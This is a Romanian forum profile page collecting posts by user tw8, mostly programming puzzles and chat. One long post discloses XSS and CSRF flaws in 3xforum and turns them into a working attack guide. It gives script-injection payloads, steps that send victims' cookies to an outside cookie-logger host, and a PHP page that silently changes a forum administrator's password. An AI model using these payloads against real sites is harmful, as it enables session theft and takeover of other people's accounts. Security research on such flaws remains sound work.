Jump to content

tw8

Active Members
  • Posts

    481
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by tw8

  1. Nytro, sincer, crezi ca are vreun rost sa pui pe forum toate API-urile si functiile Visual Basic pe care le gasesti ?

    Fa tu ceva original si atunci posteaza pentru ca nu are rost sa se umple forumul cu nspe mii de coduri de cate un rand ;).

  2. Din punctul meu de vedere ... o comunitate selecta, care include programatori, designeri, webdesigneri si simpli pasionati de IT.

    Contine tutoriale foarte bine explicate, marca OSHO [AgKelos], suri, 3NIGMA, DarkByte si multi altii.

    Va urez sedere placuta pe forumul skullbox ;).

    P.S.:

    O descriere mai "voluminoasa":

    Skullbox este casa unui grup de cunoscatori ai IT-ului si nu numai. Principala noastra preocupare este de a ajuta acele persoane care sunt la inceput de drum in acest domeniu, fie pe parte hardware sau software. Pe langa lungile discutii despre sisteme de operare, limbaje de programare, securitate si retelistica se mai afla si conversatii amicale avand o diversitate de teme.

    Oricare ti-ar fi intrebarea gasesti un raspuns – sau in cel mai rau caz un indiciu. Skullbox tinde sa devina o utopie, adica, acest forum are sa ajunga, daca continua sa se dezvolte si sa atraga useri cum a mai atras si pana acum, un loc ideal de a cere ajutor, indicii sau raspunsuri.

    In principal, intri pe skullbox pentru a invata diferite lucruri care te intereseaza sau te atrag. Te imprietenesti cu lumea. Principala regula pe acest forum este „have fun” - ceea ce inseamna in romana „distreaza-te” - adica pe langa faptul ca stai sa inveti si sa incerci te mai si distrezi.

    Lasand distractia la o parte. Pe skullbox mai gasesti si discutii despre viata de zi cu zi, deoarece, orice programator mai discuta si el din cand in cand si despre alte teme care-i bantuie mintea.

    Recent, a aparut si o rubrica de concursuri – de programare, grafica si fotografie. Sectiunea de programare din cadrul concursurilor este impartita in 3 grupe, incepatori – mediu – avansati; asa garantezi ca toti userii au ceva de zis. Cel ce castiga spune tema urmatorului concurs, asa se pot incerca o diversitate de lucruri.

    Lasand competitia dintre membrii skullbox, sa trecem mai departe. Exista o sectiune de snippet-uri(un snippet este o bucata de cod care o poti refolosii – este generala) unde poti cere snippet-uri in diferite domenii, momentan gasesti doar pentru C/C++/C#, Delphi/Pascal, PHP si Client-Side(adica HTML si Javascript).

    Mai pe scurt, skullbox e un forum it unde nu ai cum sa te plictisesti, intri necunoscator, iesi stiutor – doar daca ai vointa.

    Multumesc celui care a mutat topicul. Initial il postasem la ajutor din greseala :|.

  3. Welcome, have fun ;).

    welcome...si aia cu mai rar fete din astea....nuj...eu am intalnit fff des :P

    Apoi la cei 16 ani ai tai e normal sa fi intalnit deja cateva mii de fete care se ocupa cu "hechingul" si sa ai serverele NASA la degetul mic.

  4. *Tot ce veti citi aici este propriu. Asta inseamna 0% copiat, 100% original.

    *Daca cititi acest articol, se presupune ca aveti cunostinte de baza despre vulnerabilitatile web.

    *Articolul este divizat in 2 parti:

    #1) Prezentarea catorva vulnerabilitati

    #2) Prezentarea unei metode de utilizare a acestora

    ######

    #Vuln 1#

    ######

    Un XSS foarte interesant prin faptul ca e persistent. Vulnerabilitatea apare la postarea unui mesaj si afecteaza toti utilizatorii. La postarea unui mesaj, se pune in titlu:


    </title><SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    Efectul … javascript-ul este executat. Exemplu:


    [url]http://xsst3st.3xforum.ro/post/8/1/title_SCRIPT_SRC_http_ha_ckers_org_xss_js_SCRIPT_/[/url]

    ######

    #Vuln 2#

    ######

    Aceasta vulnerabilitate ii afecteaza doar pe administratori. Campul cu trimiterea unui SMS pentru inlaturarea reclamelor e si el vulnerabil. Introduceti:


    "><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

    In http://***nume_forum***.3xforum.ro/admin_index.php . Efectul e din nou cel asteptat: codul nu e filtrate si javascript-ul este executat.

    ######

    #Vuln 3#

    ######

    O alta vulnerabilitate de tip XSS se regaseste in chat. Este un XSS non-persistent, dar, spre deosebire de primul XSS non-persistent, este pe baza de GET, asa ca e putin mai simplu de folosit. Vulnerabilitatea:


    http://***nume_forum***.3xforum.ro/chat/?room="><script src=http://ha.ckers.org/xss.js ></script>

    Acum, pentru a exploata aceasta vulnerabilitate,trebuie sa urmariti cativa pasi:

    1. Daca nu aveti, faceti-va cont pe http://rstcenter.com . Daca aveti, logati-va (in caz ca nu sunteti deja logat).

    2. Intrati pe http://rstcenter.com/forum/ .

    3. Dati un scroll pana jos, la legenda cu utilizatorii. Dati acolo click pe nick-ul vostru.

    4. Copiati URL-ul. Va fi ceva de genul:

    http://rstcenter.com/forum/member193.rst

    5. Pastrati doar caracterele numerice. In cazul meu, ramane doar:

    193

    6. Copiati sirul :

    <script>document.location="http://rstcenter.com/index.php?pagina=cookie_logger&user= ***&logheaza="+document.cookie;</script>

    7. Inlocuiti asterix-urile cu numarul obtinut anterior. In cazul meu, am obtinut

    <script>document.location="http://rstcenter.com/index.php?pagina=cookie_logger&user= 193&logheaza="+document.cookie;</script>

    8. Intrati aici si puneti in primul camp textul obtinut, dupa care copiati textul generat:

    http://rstcenter.com/index.php?pagina=string_2_code

    9. Inlocuiti, in acest script, ceea ce este notat cu ***nume_forum*** cu numele forumului, si ceea ce este notat cu ***script*** cu textul generat anterior:

    http://***nume_forum***.3xforum.ro/chat/?room="><script>document.write(***script***)</script>

    10. Salveaza link-ul si fura cookie de la cineva. Pentru a la vizualiza, tot ce trebuie sa faci este sa accesezi:

    http://rstcenter.com/index.php?pagina=cookie_logger&vizualizare

    11. Ai terminat, nu uita sa imi multumesti :P.

    ######

    #Vuln 4#

    ######

    Din pacate (sau din fericire, pentru unii :P), asupra unui admin 3xforum pot fi tintuite si atacuri CSRF. De exemplu, din cauza ca nu se tine cont de refer ,unui admin ii poate fi schimbata parola fara macar sa isi dea seama.

    La afisarea paginii, acest exploit schimba parola administratorului de pe forumul “xsst3st” in “parola”. Pentru a schimba parola unui alt site, trebuie doar sa inlocuiti, in a treia linie, valoarea variabilei $site. Daca vreti sa setati alta parola, trebuie sa schimbati, pe a cincia linie, valoarea variabilei $password. Valoarea $id, de pe a patra linie, va recomand sa o lasati neschimbata, pentru ca aproape toti administratorii forumurilor 3xforum au id-ul numeric 2.

    Desigur, functioneaza doar daca cel care intra pe pagina este administratorul. Pentru a fi mai silentios, poate fi folosit prin iframe.



    <?php

    $site ="http://xsst3st.3xforum.ro";
    $id="2"; //valoarea default este 2
    $password = "parola"; //parola cu care ii va fi schimbata parola curenta

    $site = $site . "/profile.php?action=change_pass&id=";
    $link = $site . $id;

    $html = <<<HTML
    <form method="post" action="http://xsst3st.3xforum.ro/profile.php?action=change_pass&id=2" id="change_pass" name="tw8">
    <input type="hidden" name="form_sent" value="1">
    <table class="punmain" cellspacing="1" cellpadding="4">
    <tr class="punhead">
    <td class="punhead" colspan="2">Schimbare parola</td>
    </tr>
    <tr>
    <td class="puncon1right" style="width: 140px; white-space: nowrap">[b]Parola noua[/b]</td>
    <td class="puncon2">
    <input type="password" name="req_new_password1" size="16" maxlength="16" value="$password">

    <input type="password" name="req_new_password2" size="16" maxlength="16" value="$password">Introduceti parola inca o data </td>
    </tr>
    <tr>
    <td class="puncon1right" style="width: 140px; white-space: nowrap">Actiuni</td>
    <td class="puncon2">
    <input type="submit" name="update" value="Submit">

    </td>
    </tr>
    </table>
    </form>

    <script>
    document.tw8.submit();
    </script>

    HTML;

    echo $html;

    ?>

    #########

    #Observatie#

    #########

    Ceva nefolositor, dar care se merita amintit. Pentru admini, 3xforum are un sistem ce permite vizualizarea mesajelor in timp real. Faceti un utilizator intitulat “';alert(1);i='” (fara ghilimelele duble, dar cu ghilimelele simple) si postati un mesaj pe un forum pe care sunteti admin. Dupa putin timp, intrati pe http://**nume_forum**t.3xforum.ro/live2.php si uitati-va la sursa. Veti observa ceva de genul “\';alert(1);i=\'”. Daca ‘ nu ar fi inlocuit cu \’, ar fi un alt XSS persistent. Dupa cum am zis si mai sus, nefolositor, dar se merita amintit.

    Astept corectari, adaugiri si pareri de tot felul.

    Cam atat am avut de zis deocamdata ... bafta de la tw8.

  5. Ok, hai sa vedem ceva legat de C++ acum ;).

    Am un vector de tip intreg de 50 de elemente. Cum initializez toate valorile cu 0 fara sa parcurg vectorul (fara structuri repetitive sau goto) ?

    Haideti ca e simplu ;).

  6. stie careva cum se face un scanner de port 80 folosind un RFI exploit in perl

    :lol::lol::lol:

    Uite aici

    un program care te-ar putea ajuta, si aici search-ul pe Google pe care l-am gasit.

    Apropo ... vreo 2 versuri la care m-am gandit cand am vazut faza cu RFI-ul :)):


    You don't know how sick you make me,
    You make me fuckin' sick to my stomach,
    Everytime I think of you I [puke].
    You must just not know, uo-uo-uo-uo-uo-uoh,
    You may not think you do but you do,
    Everytime I think of you I [puke].

    Eminem - Puke ... cam veche, dar e foarte tare melodia ;).

  7. cum poti sa te aperi de atacuri DOS/DDOS ?

    ma refer bineinteles la servere.

    Se poate folosi metoda SYN Cookies, se poate folosi un router/switch pentru limitarea traficului + un firewall bun (nu prea ajuta la DDOS).

    Daca am raspuns bine, astept confirmarea ca sa vin cu intrebarea ;).

  8. Rezolvare:


    #include<iostream.h>
    #include<conio.h>

    #define sqr 1.4142135623730951;

    main()
    {
    double n, l, aux;
    int i;
    cin>>n>>l;
    aux = l / 2;
    cout<<"l1 = "<<l<<endl<<"r1 = "<<aux<<endl;
    for(i=2;i<=n;i++)
    {
    l = aux / sqr;
    aux = l / 2;
    cout<<"l"<<i<<" = "<<l<<endl<<"r"<<i<<" = "<<aux<<endl;
    }
    getch();
    }

    Intrebarea mea (foarte simplu :P): Inmultim o variabila care ocupa maxim 5 biti cu una care ocupa maxim 7 biti.

    Cati biti poate avea rezultatul (valoarea maxima) ?

  9. scuza-ma ca te intreb, care este utilitatea programului ?

    Dranaxum, sunt de acord cu moubik.

    Partea cu executatul de comenzi CMD poate fi realizata extrem de usor iar transferul de fisiere ... sa zicem doar ca nu e mare filozofie.

    Ideea e ca mi se pare cam ciudat ca la un program "by Braincode" a lucrat un singur om si ca e primul, din moment ce voi ati inceput lucrul acum vreo 4 luni de zile si aveti o echipa stufoasa.

    In fine ... bafta ;).

  10. tu ai zis :

    De exemplu, pentru n = patrat perfect si sqrt(n) = prim, va afisa ca numarul e prim. Incercati cu numarul 49 spre exemplu.

    nu ai zis acelasi lucru ... tu probabil n-ai vazut ca nu-i <= si ai zis ca merge de la 2 la 7, o sa-l vada pe 7 ca numar prim si-o sa zica ca-i 49 prim ... defapt merge foarte bine pentru 49

    De cand stii tu ce am eu in minte ?

    Scriptul lui moubik nu merge pentru 49, si pentru toate numerele de forma n = patrat perfect si sqrt(n) = prim.

    Nu ma mai enerva cu replyuri idioate si incearca sa imi dai raspunsul la intrebare.

  11. ai gresit aici pentru ca a este a+b deci la final a= a+b -|-a| = b

    Da, ai dreptate ... nu am fost atent.

    Dar tot nu e bine :P.

    Incearca cu a = negativ si b = pozitiv ;).

    LE : cre ca esti powered by beer... programul lui moubik zice i<sqrt(n) deci nu ia in calcul pe 7 ;)

    Eu nu am zis acelasi lucru :X ?

    si rezolvarile voastre ( a ta si a lui vladii nu-s cu for :) )

    Vai de plm ... ideea era sa fie folosita structura repetivitva.

    Daca esti asa mofturos, uita varianta cu for:

    #include<stdio.h> 

    main()
    {
    int a, i;
    bool p=true;
    scanf("%d", &a);
    for(i=2;i*i<=a && p==true;i++)
    {
    if(a%i==0)p=false;
    }
    if(p==false)printf("%s","nu ");
    printf("%s","este prim!");
    }

    Poate imi raspundeti si mie azi la intrebare :roll:...

  12. a= a+b;

    b=| b-a| ;

    a= a-b;

    Gresit:


    a= a+b;
    b=| b-a|=|b-a-b|=|-a| ;
    a= a-|-a|!=b;

    Varianta corecta:


    a= a+b;
    b=a-b;
    a= a-b;

    P.S.: Nici intrebarea lui moubik nu a fost bine formulata ... daca acea variabila ar fi un string treaba mergea mai greu :P. Trebuia precizat tipul de date.

    Intrebare : cum aflii daca un numar este prim cu for si fara sa folosesti break?

    Acum am observat ... si codul lui moubik e gresit:


    n = numarul posibil prim;
    esteprim = true;
    for (i = 2 ; i < sqrt(n) ; i++)
    {
    esteprim = ((n % i) == 0) ? false : esteprim;
    }

    De exemplu, pentru n = patrat perfect si sqrt(n) = prim, va afisa ca numarul e prim. Incercati cu numarul 49 spre exemplu.

    Rezolvare corecta in C:


    #include<stdio.h>

    main()
    {
    int a, i;
    bool p=true;
    scanf("%d", &a);
    i=2;
    while(i*i<=a && p==true)
    {
    if(a%i==0)p=false;
    i++;
    }
    if(p==false)printf("%s","nu ");
    printf("%s","este prim!");
    }

    Deci pun eu o intrebare ... de ce preferati sa folositi i++ in defavoarea lui ++i ?

×
×
  • Create New...